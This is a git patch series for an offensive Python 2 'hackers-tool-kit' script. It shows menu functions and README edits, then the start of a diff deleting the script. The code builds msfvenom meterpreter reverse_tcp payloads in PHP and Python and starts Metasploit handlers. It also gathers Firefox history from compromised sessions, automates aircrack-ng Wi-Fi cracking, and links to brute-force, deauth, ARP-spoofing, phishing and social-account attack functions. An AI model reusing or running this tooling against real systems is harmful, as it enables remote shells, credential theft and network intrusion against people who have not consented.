data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#CLEAR ALL START# +#---------------# +def clearall(): + os.system("clear") +#-------------# +#CLEAR ALL END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#REFRESH BANNER START# +#--------------------# +def banner(): + os.system("clear") + mainbanner() +#------------------# +#REFRESH BANNER END# + + +#PHP PAYLOAD START# +#-----------------# +def phpload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> phpload.rc') + os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') + os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) + os.system('echo "exploit\n" >> phpload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r phpload.rc') + os.system('rm -rf phpload.rc') + if yn == "n": + os.system('echo " "') +#---------------# +#PHP PAYLOAD END# + + +#PYLOAD START# +#------------# +def pyload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> pyload.rc') + os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') + os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) + os.system('echo "exploit\n" >> pyload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r pyload.rc') + os.system('rm -rf pyload.rc') + if yn == "n": + os.system('echo " "') +#----------# +#PYLOAD END# + + +#FOXHIS START# +#------------# +def foxhis(): + os.system('echo "sessions\n" >> foxhisses.rc') + os.system('echo "exit\n" >> foxhisses.rc') + os.system("service postgresql restart") + os.system('msfconsole -q -r foxhisses.rc') + os.system('rm -rf foxhisses.rc') + print "\n" + ses = raw_input("Session: ") + print "\nMaximum time (seconds) to wait for a response\n" + time = raw_input("Timeout: ") + os.system('echo "use firefox/gather/history\n" >> foxhis.rc') + os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) + os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) + os.system('echo "run\n" >> foxhis.rc') + os.system('msfconsole -q -r foxhis.rc') + os.system('rm -fr foxhis.rc') + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + if x == "banner": + banner() + if x == "phpload": + phpload() + if x == "pyload": + pyload() + if x == "foxhis": + foxhis() + found = True +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From b918c9d413137ff2af7d97d137073545840843ab Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 27 May 2019 04:06:40 +0100 Subject: [PATCH 150/214] Update README.md --- README.md | 10 ++-------- 1 file changed, 2 insertions(+), 8 deletions(-) diff --git a/README.md b/README.md index 96471d2..c0cc3b7 100644 --- a/README.md +++ b/README.md @@ -49,14 +49,8 @@ this is where i will try to put the most recent updates - -* everytime you run the script it will switch randomly between different banners - -* added banner option (same thing as clear option just people might not know that clear randomizes the banner) -also added more banners - -* added a phpload option - * added a update file * added python and php payload maker + +* added a foxhis options (firefox history gather) From 64774004aad2c4297af7bc2f0f41b696fc4e80db Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 27 May 2019 04:07:06 +0100 Subject: [PATCH 151/214] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index c0cc3b7..b659d24 100644 --- a/README.md +++ b/README.md @@ -53,4 +53,4 @@ this is where i will try to put the most recent updates * added python and php payload maker -* added a foxhis options (firefox history gather) +* added a foxhis option (firefox history gather) From b81a2a263e272eb371019719607ec0c9dea2c187 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 27 May 2019 23:32:46 +0100 Subject: [PATCH 152/214] Delete htk.py --- htk.py | 2942 -------------------------------------------------------- 1 file changed, 2942 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index c101f73..0000000 --- a/htk.py +++ /dev/null @@ -1,2942 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @tuf_unkn0wn -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @unkn0wn_bali -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner1(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def mainbanner2(): - print """ - type ? for help -\033[92m - ▄█ ▄█ ▄█ - ███ ███ ███ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███ ███ ███ - ███ ███ ███ - █▀ █▀ █▀ - - ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ - ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m - ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ - ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m - │ │ ││ ││───├┴┐│ │ - ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m -Created By @tuf_unkn0wn - """.decode('utf-8') -def mainbanner3(): - print """\033[91m - ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ - ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ - ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ - ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ - ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ - ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ - ░░ ░▒ ░ ░░ ░▒ ░ - ░ ░ ░ ░ - ░ ░ ░ ░ - \033[90m - - ████████████████████ - ██ ██\033[91m - ▒▒ ▒▒ - ░░ ░░ - ░ ░ - ░ ░\033[0m - -888 888 88888888888 888 d8P -888 888 888 888 d8P -888 888 888 888 d8P \033[1;36m -8888888888 888 888d88K -888 888 888 8888888b\033[0m -888 888 888888 888 888888 888 Y88b -888 888 888 888 Y88b -888 888 888 888 Y88b - Created By @tuf_unkn0wn On Instagram - type ? for help - """.decode('utf-8') -def mainbanner4(): - print P+""" - .S S. sdSS_SSSSSSbs .S S. - .SS SS. YSSS~S%SSSSSP .SS SS. - S%S S%S S%S S%S S&S - S%S S%S S%S S%S d*S - S%S SSSS%S S&S S&S .S*S - S&S SSS&S S&S S&S_sdSSS - S&S S&S S&S S&S~YSSY%b - S&S S&S S&S S&S `S% - S*S S*S S*S S*S S% - S*S S*S S*S S*S n& - S*S S*S S*S S*S wS& - SSS S*S S*S S*S 0 SS - h SP SP SP n - a Y Y Y k - c n - k e r s - t o o l - k i t by @tuf_u\033[0m - - type ? for help - """.decode('utf-8') -def mainbanner5(): - print R+""" - ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ - ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ - ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ - ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ - ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ - ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ - ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ - ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ - ░\033[0m - .,,,,,,,,,,.,,,.....,........................... - ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, - ..,......,.....,,.,........,,...........,,.,.... - ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ - ***********************//***/***//**/********** - ****************** ****************** @tuf_unkn0wn - *,*****,*,******** ***,************** - **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help - ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, - ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, - ***********************************************\033[91m - - ▄████▄ █ ██ ▄▄▄█████▓ ██████ - ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ - ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ - ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ - ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ - ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ - ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ - ░ ░░░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ - ░ \033[0m - """.decode('utf-8') -def mainbanner6(): - print """ - |-|____________________ - /|_|_\ /__,''___ /____ /| - |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| - |``````|_________|`````| | - | \033[93m~~~~~~~~~~~~~~\033[0m | | - | .-/\-, | | - | _\\//_ | | - | \033[92m| /(_)|\033[0m | | - |\033[92m_______|_||.-.|_______\033[0m|/| - |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| - |\033[92m```````|_||:_)|```````\033[0m| | - | \033[92m|______| \033[0m| | - | ______ | | - | (__\033[90m24\033[0m__) | | - | ~~~~~~~~ | | - | By @tuf_unkn0wn | | - |______________________|/ - \033[91m - ) ( ) ( - ( /( )\ ) ( /( )\ ( ( ( - )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( - ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ - | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) - | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< - |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ - |___/ - \033[90m - ) - (\033[33m - _ \033[0m___________ \033[90m)\033[33m - [_[\033[0m___________\033[91m#\033[0m - type ? for help - """.decode('utf-8') -def mainbanner7(): - os.system("cat /root/hackers-tool-kit/tools/skull.txt") -def mainbanner8(): - print """ - type ? for help\033[91m - -@@@ /$$ /$$ @@@ -@@@ | $$ | $$ @@@ -@@! | $$ | $$ @@! -!@! | $$$$$$$$ !@! -!!@ | $$__ $$ !!@ -!!! | $$ | $$ !!! -!!: | $$ | $$ !!: -:!: |__/ |__/ :!: -@@@ @@@\033[94m -@@@ @@@ -@@! @@! -!@! /$$$$$$$$ !@! -!!@ |__ $$__/ !!@ -!!! | $$ !!! -!!: | $$ !!: -:!:---------------| $$---------------:!: -@@@ | $$ @@@ -@@@ | $$ @@@ -@@! |__/ @@! -!@! !@!\033[91m -!!@ !!@ -!!! /$$ /$$ !!! -!!: | $$ /$$/ !!: -:!: | $$ /$$/ :!: -@@@ | $$$$$/ @@@ -@@@ | $$ $$ @@@ -@@! | $$\ $$ @@! -!@! | $$ \ $$ !@! -!!@ |__/ \__/ !!@ -!!! !!! -!!: !!: -:!: :!:\033[92m - :: :: -: @tuf_unkn0wn :\033[0m -""" -def mainbanner9(): - print """ -\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ -║ ║ -\033[33m║ ║ -║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ -\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ -║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ -\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ -║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ -\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ -║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ -\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ -║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ -\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ -║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ -\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ -║\033[0m █ ▐ ▀ █ ▐ \033[95m║ -\033[35m║\033[0m ▐ ▐ \033[35m║ -║ ║\033[1;31m -╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m - type ? for help - """.decode('utf-8') - -def mainbanner10(): - print """\033[0m - ░░░▓█▒░▒▒▒▓▓░ - ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ - ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ - ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ - ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ - ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ - ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ - ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ - 